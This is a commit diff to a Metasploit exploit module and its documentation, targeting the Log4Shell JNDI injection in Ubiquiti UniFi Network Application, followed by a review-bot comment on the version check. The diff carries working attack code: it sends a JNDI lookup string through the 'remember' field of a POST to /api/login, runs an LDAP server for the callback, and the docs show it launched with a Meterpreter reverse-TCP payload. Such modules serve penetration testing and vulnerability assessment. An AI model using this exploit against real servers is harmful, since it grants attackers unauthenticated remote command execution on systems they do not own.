Add details to check codes and PR feedback
parent
579627f5c7
commit
458d584f83
|
@ -2,8 +2,9 @@
|
|||
|
||||
### Description
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||
object. This results in OS command execution in the context of the server application.
|
||||
|
||||
This module will start an LDAP server that the target will need to connect to.
|
||||
|
||||
|
@ -33,7 +34,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
|
|||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
||||
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
||||
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||
[*] Using configured payload windows/meterpreter/reverse_tcp
|
||||
|
|
|
@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||
'Description' => %q{
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||
object. This results in OS command execution in the context of the server application.
|
||||
|
||||
This module will start an LDAP server that the target will need to connect to.
|
||||
},
|
||||
|
@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def check
|
||||
validate_configuration!
|
||||
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
||||
return Exploit::CheckCode::Unknown if res.nil?
|
||||
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||
|
||||
server_version = res.get_json_document.dig('meta', 'server_version')
|
||||
return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
|
||||
return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
|
||||
|
||||
vprint_status("Detected version: #{server_version}")
|
||||
server_version = Rex::Version.new(server_version)
|
||||
|
@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
||||
|
||||
start_service
|
||||
trigger
|
||||
res = trigger
|
||||
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||
|
||||
wait_until { @search_received }
|
||||
return Exploit::CheckCode::Unknown unless @search_received
|
||||
|
||||
Exploit::CheckCode::Vulnerable
|
||||
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
|
||||
ensure
|
||||
stop_service
|
||||
end
|
||||
|
@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => {
|
||||
'username' => jndi_string,
|
||||
'username' => rand_text_alphanumeric(8..16), # can not be blank!,
|
||||
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
||||
'remember' => jndi_string,
|
||||
'strict' => true
|
||||
|
|
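Review bot: In `check`, the version guard `server_version =~ /(\d+\.)+/` is unanchored, so any string that merely contains a digit followed by a dot passes it and is then handed to `Rex::Version.new`, which may raise on a malformed value instead of returning a check code. Assuming the `status` endpoint reports plain dotted versions, an anchored test such as `unless server_version.to_s.match?(/\A\d+(\.\d+)+\z/)` would keep the guard and the parser in agreement. Returning `Safe` when no version could be read also risks a false negative in an assessment report, because an unexpected or non-JSON reply says nothing about whether the application is patched; `Exploit::CheckCode::Unknown('Could not determine the server version.')` would be the more cautious result. The version-range comparison sits between the hunks and is not visible here, so this rests on the shown lines only.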